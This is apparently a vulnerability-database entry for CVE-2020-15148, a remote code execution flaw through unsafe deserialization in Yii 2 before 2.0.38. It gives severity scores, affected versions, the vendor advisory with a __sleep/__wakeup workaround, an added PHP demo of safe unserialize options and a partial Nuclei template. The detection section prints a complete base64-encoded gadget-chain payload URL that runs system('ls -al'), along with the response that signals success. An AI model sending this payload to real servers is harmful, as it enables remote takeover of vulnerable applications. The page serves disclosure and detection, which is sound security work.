CVE-2020-15148
Published 2020-09-15

Priority: P182 · Severity: critical · CVSS 3.1 base score 10 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) · EXPLOIT · EPSS 78.76% (99.5th percentile)
Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. This is fixed in version 2.0.38. A possible workaround without upgrading is available in the linked advisory.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yiiframework | yii | < 2.0.38 | 2.0.38 |
| yiisoft | yii2 | < 2.0.38 | 2.0.38 |
| yiisoft | yii2 | >= 0 < 2.0.38 | 2.0.38 |
Detection & IOCs (extracted from sources)

- url: `/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==`

- The exploit delivers a serialized PHP object payload via the `data` GET parameter to `/index.php?r=test/sss`. The payload is base64-encoded and abuses the `yii\db\BatchQueryResult` and `yii\rest\CreateAction` gadget chain to invoke `system()` with `ls -al`.
- Successful exploitation returns HTTP 500, and the response body contains both the string `total` (from the `ls -al` output) and `An internal server error occurred.`
- The vulnerability is triggered when the application calls `unserialize()` on arbitrary user input, enabling a PHP deserialization gadget chain that leads to RCE.
CVSS provenance
- NVD, CVSS v3.1: 10.0 CRITICAL, `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
- NVD, CVSS v2.0: 7.5 HIGH, `AV:N/AC:L/Au:N/C:P/I:P/A:P`
GHSA
Unsafe deserialization in Yii 2
ghsa·2020-09-15
CVE-2020-15148 [HIGH] CWE-502 Unsafe deserialization in Yii 2
### Impact
Remote code execution in case the application calls `unserialize()` on user input containing a specially crafted string.
### Patches
2.0.38
### Workarounds
Add the following to BatchQueryResult.php:
```php
// Refuse to take part in serialization in either direction, so the class
// can no longer be used as the entry point of a gadget chain.
public function __sleep()
{
    throw new \BadMethodCallException('Cannot serialize ' . __CLASS__);
}

public function __wakeup()
{
    throw new \BadMethodCallException('Cannot unserialize ' . __CLASS__);
}
```
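As an added illustration (not part of the advisory or of the Yii code base), the script below applies the same `__sleep`/`__wakeup` guard to a hypothetical `GuardedResult` class standing in for `yii\db\BatchQueryResult`, and contrasts it with the class-independent `allowed_classes` option of `unserialize()`; the class name and the serialized string are constructed for the demo.

```php
<?php
// Added example (not from the Yii advisory): two defences against PHP
// deserialization gadget chains. GuardedResult is a hypothetical stand-in
// for a class like yii\db\BatchQueryResult that must never be (un)serialized.
declare(strict_types=1);

final class GuardedResult
{
    public function __construct(private string $label) {}

    // Same guard the advisory recommends: refuse both directions.
    public function __sleep(): array
    {
        throw new \BadMethodCallException('Cannot serialize ' . __CLASS__);
    }

    public function __wakeup(): void
    {
        throw new \BadMethodCallException('Cannot unserialize ' . __CLASS__);
    }
}

// 1. The guard stops an instance from ever being serialized by the app itself.
try {
    serialize(new GuardedResult('x'));
    echo "unexpected: serialize succeeded\n";
} catch (\BadMethodCallException $e) {
    echo "serialize blocked: {$e->getMessage()}\n";
}

// 2. Hand-built serialized string (constructed for the demo) naming the class,
//    the way attacker-controlled input would. __wakeup rejects it.
$crafted = 'O:13:"GuardedResult":1:{s:20:"' . "\0GuardedResult\0label" . '";s:1:"x";}';
try {
    unserialize($crafted);
    echo "unexpected: unserialize succeeded\n";
} catch (\BadMethodCallException $e) {
    echo "unserialize blocked: {$e->getMessage()}\n";
}

// 3. Defence independent of any one class: allowed_classes => false means no
//    object is instantiated, so no gadget chain can start. The result is a
//    __PHP_Incomplete_Class, which the application should reject as untrusted.
$inert = unserialize($crafted, ['allowed_classes' => false]);
echo get_class($inert), "\n"; // __PHP_Incomplete_Class

// Untrusted data belongs in a format that cannot instantiate objects at all.
$safe = json_decode('{"label":"x"}', true, 512, JSON_THROW_ON_ERROR);
echo $safe['label'], "\n";
```

The first two checks show the per-class guard; the third is the setting to use on any `unserialize()` call that must accept external input at all.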
### For more information
If you have any questions or comments about this advisory, [contact us through security form](https://www.yiiframework.com/security).
OSV
Unsafe deserialization in Yii 2
osv·2020-09-15
CVE-2020-15148 [HIGH] Unsafe deserialization in Yii 2
No detection rules found.
Nuclei
Yii 2 < 2.0.38 - Remote Code Execution
nuclei·CVSS 10.0
CVE-2020-15148 [CRITICAL] Yii 2 < 2.0.38 - Remote Code Execution
Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input.
Template:
```yaml
id: CVE-2020-15148
info:
  name: Yii 2 < 2.0.38 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: Upgrade to version 2.0.38 or later. A possible workaround without upgrading is available in the linked advisory.
  reference:
    - https://blog.csdn.net/xuandao_ahfengren/article/details/1112599
```
No writeups or analysis indexed.
References:
- https://github.com/yiisoft/yii2/commit/9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99
- https://github.com/yiisoft/yii2/security/advisories/GHSA-699q-wcff-g9mj

Published: 2020-09-15